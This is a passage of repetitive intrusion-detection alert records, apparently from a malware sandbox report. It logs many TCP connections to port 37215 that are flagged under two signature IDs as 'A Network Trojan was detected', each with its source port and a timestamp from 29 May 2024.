                SID:2829579
                Source Port:49700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237664
                SID:2829579
                Source Port:39958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231100
                SID:2829579
                Source Port:34940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264759
                SID:2835222
                Source Port:41778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361421
                SID:2829579
                Source Port:42460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237493
                SID:2829579
                Source Port:42236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766890
                SID:2829579
                Source Port:42472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514134
                SID:2829579
                Source Port:40818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868185
                SID:2835222
                Source Port:50042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896044
                SID:2829579
                Source Port:33824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.612296
                SID:2829579
                Source Port:41850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422175
                SID:2829579
                Source Port:50352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897335
                SID:2829579
                Source Port:33640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.030357
                SID:2829579
                Source Port:55990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711774
                SID:2835222
                Source Port:34718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443347
                SID:2835222
                Source Port:45370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626675
                SID:2835222
                Source Port:54668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074960
                SID:2835222
                Source Port:54594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560179
                SID:2835222
                Source Port:36038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001311
                SID:2829579
                Source Port:45772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979691
                SID:2829579
                Source Port:36218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900723
                SID:2829579
                Source Port:41174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584384
                SID:2829579
                Source Port:35816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217064
                SID:2835222
                Source Port:50876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.060599
                SID:2835222
                Source Port:56930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.718107
                SID:2835222
                Source Port:36316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652007
                SID:2835222
                Source Port:52810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.436925
                SID:2829579
                Source Port:35292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262687
                SID:2829579
                Source Port:48626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024660
                SID:2829579
                Source Port:33072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610874
                SID:2835222
                Source Port:51250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.772352
                SID:2835222
                Source Port:45216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331769
                SID:2829579
                Source Port:52692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.645152
                SID:2835222
                Source Port:47454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.457663
                SID:2829579
                Source Port:41754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586880
                SID:2835222
                Source Port:54660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848771
                SID:2835222
                Source Port:53546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014832
                SID:2835222
                Source Port:54626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462471
                SID:2829579
                Source Port:39804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666991
                SID:2835222
                Source Port:35244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975976
                SID:2829579
                Source Port:50972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175070
                SID:2829579
                Source Port:36036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.802877
                SID:2835222
                Source Port:32934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521209
                SID:2829579
                Source Port:56368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266992
                SID:2829579
                Source Port:42920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.673412
                SID:2829579
                Source Port:37158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573369
                SID:2829579
                Source Port:50652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848873
                SID:2835222
                Source Port:51240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467394
                SID:2829579
                Source Port:57048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.904947
                SID:2829579
                Source Port:35334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111675
                SID:2829579
                Source Port:51258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375071
                SID:2829579
                Source Port:47062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261776
                SID:2835222
                Source Port:46276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.439658
                SID:2829579
                Source Port:43218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721636
                SID:2835222
                Source Port:58802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325473
                SID:2829579
                Source Port:34626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440932
                SID:2835222
                Source Port:40372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731832
                SID:2829579
                Source Port:41952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.689657
                SID:2829579
                Source Port:38478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817177
                SID:2835222
                Source Port:60074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652511
                SID:2835222
                Source Port:50320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956211
                SID:2829579
                Source Port:33608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517918
                SID:2829579
                Source Port:45736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.168722
                SID:2835222
                Source Port:56772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269684
                SID:2829579
                Source Port:40564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765166
                SID:2829579
                Source Port:38698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.234936
                SID:2835222
                Source Port:59402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584096
                SID:2829579
                Source Port:35216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.625289
                SID:2829579
                Source Port:57046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899532
                SID:2829579
                Source Port:48358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436506
                SID:2835222
                Source Port:41180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.800816
                SID:2835222
                Source Port:57650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943086
                SID:2835222
                Source Port:45640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505087
                SID:2835222
                Source Port:36932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.060816
                SID:2829579
                Source Port:48306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763276
                SID:2835222
                Source Port:51724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965001
                SID:2835222
                Source Port:41202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887762
                SID:2835222
                Source Port:40562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971313
                SID:2829579
                Source Port:57742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867909
                SID:2829579
                Source Port:41884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617202
                SID:2835222
                Source Port:44038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858506
                SID:2835222
                Source Port:38222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180268
                SID:2829579
                Source Port:45254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.092751
                SID:2835222
                Source Port:36698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026578
                SID:2835222
                Source Port:33582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916189
                SID:2835222
                Source Port:37248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.274428
                SID:2835222
                Source Port:49864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688116
                SID:2835222
                Source Port:37490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.694343
                SID:2829579
                Source Port:53326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985587
                SID:2835222
                Source Port:60936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967526
                SID:2835222
                Source Port:37516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.458661
                SID:2829579
                Source Port:48012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520504
                SID:2835222
                Source Port:41982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436320
                SID:2829579
                Source Port:40748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443115
                SID:2829579
                Source Port:57596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795575
                SID:2829579
                Source Port:39618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559134
                SID:2829579
                Source Port:34328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896911
                SID:2835222
                Source Port:33108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897256
                SID:2835222
                Source Port:39948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620733
                SID:2835222
                Source Port:52722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868769
                SID:2835222
                Source Port:34220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868291
                SID:2835222
                Source Port:55658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025354
                SID:2835222
                Source Port:38912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088290
                SID:2829579
                Source Port:55266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556141
                SID:2829579
                Source Port:52008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179601
                SID:2829579
                Source Port:45176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223795
                SID:2835222
                Source Port:49684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429368
                SID:2829579
                Source Port:40062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440548
                SID:2829579
                Source Port:60592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.269983
                SID:2835222
                Source Port:40904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.027374
                SID:2835222
                Source Port:60028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.910053
                SID:2835222
                Source Port:45316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867972
                SID:2829579
                Source Port:40060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666808
                SID:2835222
                Source Port:57388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422131
                SID:2829579
                Source Port:45158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416101
                SID:2835222
                Source Port:57226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321064
                SID:2829579
                Source Port:37154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171917
                SID:2829579
                Source Port:50708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.144457
                SID:2835222
                Source Port:55202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898707
                SID:2829579
                Source Port:55744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136215
                SID:2829579
                Source Port:41202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499764
                SID:2829579
                Source Port:42866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947812
                SID:2835222
                Source Port:60624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.043350
                SID:2835222
                Source Port:36556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962319
                SID:2829579
                Source Port:34568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091854
                SID:2829579
                Source Port:48292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.095639
                SID:2835222
                Source Port:56288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931084
                SID:2835222
                Source Port:57770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.733560
                SID:2829579
                Source Port:44422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900247
                SID:2829579
                Source Port:37744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711743
                SID:2835222
                Source Port:37808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227161
                SID:2835222
                Source Port:36886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626983
                SID:2835222
                Source Port:46878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630813
                SID:2835222
                Source Port:51716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140306
                SID:2835222
                Source Port:59032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.427411
                SID:2835222
                Source Port:57530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227055
                SID:2835222
                Source Port:56146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963190
                SID:2829579
                Source Port:58702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042869
                SID:2829579
                Source Port:49310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263591
                SID:2835222
                Source Port:40554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981540
                SID:2829579
                Source Port:54552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.446370
                SID:2829579
                Source Port:57114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.427361
                SID:2835222
                Source Port:56842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511449
                SID:2835222
                Source Port:49638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.317182
                SID:2835222
                Source Port:36472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.041409
                SID:2829579
                Source Port:39686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264899
                SID:2829579
                Source Port:47188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010334
                SID:2829579
                Source Port:40838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948141
                SID:2835222
                Source Port:44880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.070196
                SID:2829579
                Source Port:46792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318678
                SID:2835222
                Source Port:45380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887676
                SID:2829579
                Source Port:51750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561940
                SID:2829579
                Source Port:46816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.653422
                SID:2835222
                Source Port:60486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381243
                SID:2835222
                Source Port:36314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267667
                SID:2835222
                Source Port:50534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374483
                SID:2829579
                Source Port:50200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160083
                SID:2835222
                Source Port:53848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179624
                SID:2835222
                Source Port:48232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.625038
                SID:2835222
                Source Port:39046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463135
                SID:2835222
                Source Port:44978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992912
                SID:2835222
                Source Port:50148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326194
                SID:2835222
                Source Port:50766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165470
                SID:2835222
                Source Port:45110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558173
                SID:2835222
                Source Port:41640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.904842
                SID:2829579
                Source Port:40246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364204
                SID:2835222
                Source Port:51762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328514
                SID:2829579
                Source Port:51706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640803
                SID:2829579
                Source Port:55922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983285
                SID:2835222
                Source Port:34614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931361
                SID:2829579
                Source Port:34194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988918
                SID:2829579
                Source Port:53474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500666
                SID:2835222
                Source Port:54804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162632
                SID:2829579
                Source Port:33890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854103
                SID:2835222
                Source Port:49670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369265
                SID:2829579
                Source Port:56994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583152
                SID:2829579
                Source Port:40848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532800
                SID:2829579
                Source Port:51446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.290384
                SID:2835222
                Source Port:53758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558160
                SID:2835222
                Source Port:35042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997658
                SID:2835222
                Source Port:56330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558257
                SID:2829579
                Source Port:53250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369692
                SID:2829579
                Source Port:55342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854227
                SID:2829579
                Source Port:49828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.523845
                SID:2829579
                Source Port:33850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.961020
                SID:2835222
                Source Port:55526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.109075
                SID:2835222
                Source Port:44368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.422169
                SID:2829579
                Source Port:51894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141166
                SID:2829579
                Source Port:43484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967543
                SID:2829579
                Source Port:37180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175362
                SID:2829579
                Source Port:51290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176743
                SID:2835222
                Source Port:60588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155684
                SID:2829579
                Source Port:56742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363412
                SID:2835222
                Source Port:55540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944066
                SID:2829579
                Source Port:41220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886107
                SID:2835222
                Source Port:60870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.537566
                SID:2829579
                Source Port:47466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287315
                SID:2829579
                Source Port:48302
                Destination Port:37215
